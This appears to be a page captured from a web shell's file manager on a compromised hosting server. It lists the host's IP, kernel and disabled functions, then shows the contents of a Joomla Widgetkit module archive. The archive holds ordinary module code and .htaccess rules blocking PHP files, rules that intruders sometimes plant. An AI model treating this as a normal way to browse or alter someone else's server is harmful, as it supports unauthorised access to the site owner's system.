uawdijnntqw1x1x1
IP : 216.73.217.98
Hostname : webm013.cluster110.gra.hosting.ovh.net
Kernel : Linux webm013.cluster110.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
saisons
/
www
/
25aec
/
.
/
..
/
5dfee
/
.
/
mod_widgetkit.tar
/
/
.htaccess000044400000000177152435301660006352 0ustar00<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'> Order allow,deny Deny from all </FilesMatch>mod_widgetkit.xml000060400000001724152435301660010125 0ustar00<?xml version="1.0" encoding="utf-8"?> <extension type="module" version="3.1" method="upgrade" client="site"> <name>Widgetkit</name> <version>2.9.11</version> <description>A widget toolkit by YOOtheme.</description> <creationDate>July 2017</creationDate> <copyright>Copyright (C) YOOtheme GmbH</copyright> <license>GNU General Public License v2 or later</license> <author>YOOtheme</author> <authorEmail>info@yootheme.com</authorEmail> <authorUrl>http://yootheme.com</authorUrl> <files> <filename module="mod_widgetkit">mod_widgetkit.php</filename> <folder>elements</folder> </files> <config> <fields name="params" > <fieldset name="basic" addfieldpath="/modules/mod_widgetkit/elements"> <field name="widgetkit" type="widget" default="" label="Widget" description="Select a Widget to display" required="true" /> </fieldset> </fields> </config> </extension> mod_widgetkit.php000060400000000607152435301660010113 0ustar00<?php defined('_JEXEC') or die; $render = function() use ($params) { if (!$app = @include(JPATH_ADMINISTRATOR . '/components/com_widgetkit/widgetkit-app.php')) { return; } $output = $app->renderWidget(json_decode($params->get('widgetkit', '[]'), true)); echo $output === false ? $app['translator']->trans('Could not load widget') : $output; }; return $render(); elements/widget.php000060400000001650152435301660010357 0ustar00<?php defined('_JEXEC') or die; class JFormFieldWidget extends JFormField { protected $type = 'Widget'; function getInput() { if (!$app = @include(JPATH_ADMINISTRATOR . '/components/com_widgetkit/widgetkit-app.php')) { return; } $app->trigger('init.admin', array($app)); $value = htmlspecialchars($this->value, ENT_QUOTES, 'UTF-8'); // Check if front end editing. if (!$app['admin'] && $app['config']->get('theme.support') !== true) { return sprintf('<a href="administrator/index.php?option=com_modules&task=module.edit&id=%d" class="btn btn-small">Edit in Backend.</a>', intval($_GET['id'])); } return <<<EOT <button type="button" class="btn btn-small widgetkit-widget"> <span>{$app['translator']->trans('Select Widget')}</span> </button> <input type="hidden" name="$this->name" value="$value"> EOT; } } elements/.htaccess000044400000000177152435301660010166 0ustar00<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'> Order allow,deny Deny from all </FilesMatch>
/home/saisons/www/25aec/./../5dfee/./mod_widgetkit.tar